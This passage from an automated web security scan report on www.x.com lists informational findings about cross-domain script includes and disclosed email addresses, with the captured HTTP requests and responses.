Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b332c3133363935343b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:51:56 GMT; Path=/
Vary: User-Agent
JP: D=77481 t=1313157116029628
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.245. https://www.x.com/people/omuleanu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/omuleanu

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/omuleanu HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:42 GMT; Path=/
Vary: User-Agent
JP: D=161006 t=1313157162705096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.246. https://www.x.com/people/pluto26  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/pluto26

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/pluto26 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:40 GMT; Path=/
Vary: User-Agent
JP: D=76607 t=1313157160904760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.247. https://www.x.com/people/posiden5665  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/posiden5665

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/posiden5665 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3134303635343b332c3133343430323b332c34383739343b332c39313330313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=81038 t=1313157130321120
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.248. https://www.x.com/people/ramonmorales123  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ramonmorales123

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/ramonmorales123 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3132323335343b332c3133343430323b332c34383739343b332c3134303635343b332c39313330313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=87382 t=1313157130920019
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.249. https://www.x.com/people/rizkygarut  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/rizkygarut

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/rizkygarut HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133363935343b332c35333735313b332c3133383538323b332c36303039313b332c3133373131353b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78953 t=1313157110910504
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.250. https://www.x.com/people/roguereptile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/roguereptile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/roguereptile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=134822 t=1313157130043079
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.251. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b332c3131313737343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:33 GMT; Path=/
Vary: User-Agent
JP: D=72931 t=1313157153516546
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.252. https://www.x.com/people/sebastian.kopp@wooga.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/sebastian.kopp@wooga.com

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/sebastian.kopp@wooga.com HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b; Expires=Sun, 11-Sep-2011 13:52:03 GMT; Path=/
Vary: User-Agent
JP: D=79810 t=1313157123276448
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.253. https://www.x.com/people/skier  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/skier

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/skier HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31323739393b332c3133313833303b332c3133363236393b332c3132393239303b332c3133373135383b332c3133373331333b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=93161 t=1313157133808445
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.254. https://www.x.com/projects/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /projects/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=83836 t=1313157103895348
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.255. https://www.x.com/search.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /search.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=25842 t=1313157255790926
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.256. https://www.x.com/tags  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /tags

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tags HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=270750 t=1313157263884148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.257. https://www.x.com/tags/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /tags/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tags/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=139885 t=1313157103442140
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.258. https://www.x.com/threads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /threads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /threads HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: User-Agent
JP: D=399265 t=1313157098002095
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

8. Email addresses disclosed  previous  next
There are 36 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


8.1. https://www.x.com/community/feeds/blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/blogs

Issue detail

The following email address was disclosed in the response:

Request

GET /community/feeds/blogs HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:07 GMT
Server: Apache-Coyote/1.1
Last-Modified: Fri, 12 Aug 2011 05:00:01 GMT
Etag: "1313125201939"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=32459 t=1313157008547513
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
<author>travis@travisrobertson.com</author>
...[SNIP]...

8.2. https://www.x.com/community/feeds/documents  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/documents

Issue detail

The following email addresses were disclosed in the response:

Request

GET /community/feeds/documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:09 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 11 Aug 2011 22:17:57 GMT
Etag: "1313101077659"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=39783 t=1313157009161570
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
s scheduled to be available in July 2011.&amp;#160; If you are interested in evaluating and developing for the new version, please send your request to &lt;a class="jive-link-email-small" href="mailto:payflowbeta@paypal.com"&gt;payflowbeta@paypal.com&lt;/a&gt;.&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;May 25, 2011 (Pilot Environment Only.&amp;#160; Released to production on Ju
...[SNIP]...
amp;BILLTOCOUNTRY[3]=840&amp;amp;BILLTOZIP[5]=12345&amp;amp;&lt;br/&gt;BILLTOPHONENUM[12]=555-243-7689&amp;amp;BILLTOEMAIL&lt;span&gt;[22]&lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:=Joe.Smith@anyemail.com"&gt;=Joe.Smith@anyemail.com&lt;/a&gt;&lt;span&gt;&amp;amp;&lt;br/&gt;BILLTOFIRSTNAME[3]=Joe&amp;amp;BILLTOLASTNAME[5]=Smith&amp;amp;SHIPTOSTREET&lt;/span&gt;[12]=123 Main St.&lt;br/&gt;&amp;amp;SHIPTOCITY[8]=San Jose&amp;amp;SHI
...[SNIP]...
STATE[2]=CA&amp;amp;SHIPTOCOUNTRY[3]=840&amp;amp;&lt;br/&gt;SHIPTOZIP[5]=12345&amp;amp;SHIPTOPHONE[12]=555-243-7689&amp;amp;SHIPTOEMAIL[22]&lt;br/&gt;=&lt;a class="jive-link-email-small" href="mailto:=Joe.Smith@anyemail.com"&gt;Joe.Smith@anyemail.com&lt;/a&gt;&lt;span&gt;&amp;amp;SHIPTOFIRSTNAME[3]=Joe&amp;amp;SHIPTOLASTNAME[5]=Smith&lt;br/&gt;&amp;amp;USER[9]&lt;/span&gt;=toddprov4&amp;amp;VENDOR[9]=toddprov4&amp;amp;PARTNER[8]=VeriSign&amp;amp;P
...[SNIP]...

8.3. https://www.x.com/community/feeds/messages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/messages

Issue detail

The following email addresses were disclosed in the response:

Request

GET /community/feeds/messages HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:15 GMT
Server: Apache-Coyote/1.1
Last-Modified: Fri, 12 Aug 2011 13:49:18 GMT
Etag: "1313156958073"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=11113 t=1313157015643994
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
